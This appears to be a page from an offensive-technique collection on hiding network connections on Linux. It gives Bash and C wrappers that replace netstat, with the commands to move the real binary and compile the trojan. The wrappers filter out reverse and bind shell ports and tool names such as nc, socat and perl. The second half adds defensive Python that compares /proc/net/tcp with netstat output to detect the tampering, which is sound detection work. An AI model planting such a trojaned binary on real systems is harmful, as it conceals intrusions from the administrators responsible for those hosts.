Secondary Categories: 02-Defense Evasion
There are a lot of different methods on Linux to view connections. We can hide specific connections from a tool such as netstat by using one of two methods:
Both of these methods rely on the original binary still being on the system, so what we do is move the file and rename it, then place our new binary or script at a location that comes earlier in the PATH than the original file.
# We are moving the original
mv /bin/netstat /usr/sbin/ns.bak
Bash:
In this case we use "$@" to ensure that any parameters passed by the user are also passed through to the original binary.
#!/bin/bash
# Run the moved original binary with the user's arguments, then drop lines
# matching the ports and tool names we want to hide from the output.
/usr/sbin/ns.bak "$@" | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
C:
In the example below we use grep inside a small C wrapper to filter out any of the common ports we use for bind shells or reverse shells, along with a few tool names.
#include <string.h>
#include <unistd.h>
int main(int a, char **b) {
    char *c[a + 4];  /* sh -c '<cmd>' <argv[0]> <user args...> NULL */
    c[0] = "sh"; c[1] = "-c";
    c[2] = "/usr/sbin/ns.bak $* | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'";
    memcpy(c + 3, b, sizeof(char *) * a);  /* argv[0] becomes $0, the rest $1.. */
    c[a + 3] = NULL;
    execv("/bin/sh", c);
}
Compiling the binary:
gcc -xc /tmp/.netstat.c -o /usr/bin/netstat
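From the defender's side, the weakness of both wrappers is that they filter netstat's text output, not the kernel's socket table, so reading /proc/net/tcp directly and diffing it against what netstat prints exposes the hidden lines. The following is an added example, not code from the original page; the /proc/net/tcp content and the netstat -tan output are constructed samples (the 10.0.2.1:4444 connection is the one the wrapper above would strip).

```python
import socket
import struct

TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN"}  # only the states used here

# Constructed sample of /proc/net/tcp: addresses are little-endian hex IPv4, ports hex.
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0 100 0 0 10 0
   1: 0F02000A:D431 22D8B85D:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 12346 1 0 20 4 30 10 -1
   2: 0F02000A:CB20 0102000A:115C 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0 20 4 30 10 -1
"""

# Constructed 'netstat -tan' output as printed by a wrapped netstat (the :4444 line is missing).
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.2.15:54321         93.184.216.34:443       ESTABLISHED
"""

def _hex_endpoint(field):
    """Decode a /proc/net/tcp endpoint such as '0F02000A:CB20' into '10.0.2.15:52000'."""
    addr_hex, port_hex = field.split(":")
    addr = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))  # little-endian 32-bit
    return f"{addr}:{int(port_hex, 16)}"

def parse_proc_net_tcp(text):
    """Return {(local, remote, state)} straight from the kernel's socket table."""
    sockets = set()
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        state = TCP_STATES.get(fields[3], fields[3])
        sockets.add((_hex_endpoint(fields[1]), _hex_endpoint(fields[2]), state))
    return sockets

def parse_netstat(text):
    """Return {(local, remote, state)} from 'netstat -tan' output, normalising '*' to port 0."""
    sockets = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "tcp":
            continue
        sockets.add((fields[3], fields[4].replace(":*", ":0"), fields[5]))
    return sockets

def find_hidden_sockets(proc_text, netstat_text):
    """Sockets the kernel reports that netstat failed to print: evidence of a filtering wrapper."""
    return sorted(parse_proc_net_tcp(proc_text) - parse_netstat(netstat_text))
```

On a live host, feed `open("/proc/net/tcp").read()` and the captured `netstat -tan` output to `find_hidden_sockets`; a non-empty result means the netstat on PATH is not showing everything the kernel has, and the binary should be verified against its package (for example with `dpkg --verify` or `rpm -V`).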